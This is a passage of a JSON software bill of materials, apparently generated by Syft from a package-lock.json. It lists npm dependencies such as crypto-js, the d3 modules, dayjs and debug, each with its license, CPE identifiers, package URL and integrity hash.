lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/crypto-js@4.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz","integrity":"sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q==","dependencies":null}},{"id":"7ab312baa29fde7a","name":"cssesc","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cssesc@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz","integrity":"sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==","dependencies":null}},{"id":"7a5abc30c1904007","name":"csstype","version":"3.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/csstype@3.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz","integrity":"sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==","dependencies":null}},{"id":"d16a22647e62d254","name":"d3-array","version":"3.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-array@3.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz","integrity":"sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg==","dependencies":{"internmap":"1 - 2"}}},{"id":"633ef642a5395c1a","name":"d3-color","version":"3.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-color@3.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz","integrity":"sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA==","dependencies":null}},{"id":"5c5a953bcb066b0e","name":"d3-ease","version":"3.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-ease@3.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz","integrity":"sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w==","dependencies":null}},{"id":"5199669646af57ab","name":"d3-format","version":"3.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-format@3.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz","integrity":"sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg==","dependencies":null}},{"id":"2bcd6b2445ac379d","name":"d3-interpolate","version":"3.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-interpolate@3.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz","integrity":"sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g==","dependencies":{"d3-color":"1 - 3"}}},{"id":"63d3c4d24d9be1d5","name":"d3-path","version":"3.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-path@3.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz","integrity":"sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ==","dependencies":null}},{"id":"6f08c8eb1953f0ad","name":"d3-scale","version":"4.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-scale@4.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz","integrity":"sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ==","dependencies":{"d3-array":"2.10.0 - 3","d3-format":"1 - 3","d3-interpolate":"1.2.0 - 3","d3-time":"2.1.1 - 3","d3-time-format":"2 - 4"}}},{"id":"62919ef646dbae92","name":"d3-shape","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-shape@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz","integrity":"sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA==","dependencies":{"d3-path":"^3.1.0"}}},{"id":"809edf0f6cbf0d31","name":"d3-time","version":"3.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-time@3.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz","integrity":"sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q==","dependencies":{"d3-array":"2 - 3"}}},{"id":"4c75f293b12c6086","name":"d3-time-format","version":"4.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-time-format@4.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz","integrity":"sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg==","dependencies":{"d3-time":"1 - 3"}}},{"id":"1f58b04c062182d6","name":"d3-timer","version":"3.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/d3-timer@3.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz","integrity":"sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA==","dependencies":null}},{"id":"11ebb955a4940d8a","name":"dayjs","version":"1.11.20","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dayjs@1.11.20","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz","integrity":"sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ==","dependencies":null}},{"id":"791d0c8d38a3b042","name":"debug","version":"2.6.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/debug@2.6.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/debug/-/debug-2.6.9.tgz","integrity":"sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==","dependencies":{"ms":"2.0.0"}}},{"id":"96b0606cb5228062","name":"debug","version":"4.4.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/debug@4.4.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/debug/-/debug-4.4.3.tgz","integrity":"sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==","dependencies":{"ms":"^2.1.3"}}},{"id":"56044f762e36d59b","name":"decamelize","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/decamelize@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz","integrity":"sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA==","dependencies":null}},{"id":"6135efdaaf1822bb","name":"decimal.js-light","version":"2.5.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/decimal.js-light@2.5.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz","integrity":"sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==","dependencies":null}},{"id":"6fcde9d497e83e33","name":"deepmerge","version":"4.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/deepmerge@4.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz","integrity":"sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==","dependencies":null}},{"id":"c23340a58ec36159","name":"delayed-stream","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/delayed-stream@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz","integrity":"sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==","dependencies":null}},{"id":"b292c74570fb7df3","name":"denque","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/denque@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/denque/-/denque-2.1.0.tgz","integrity":"sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==","dependencies":null}},{"id":"82a407fce3facea3","name":"depd","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/depd@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/depd/-/depd-2.0.0.tgz","integrity":"sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==","dependencies":null}},{"id":"916ee50fe6c61deb","name":"destroy","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","t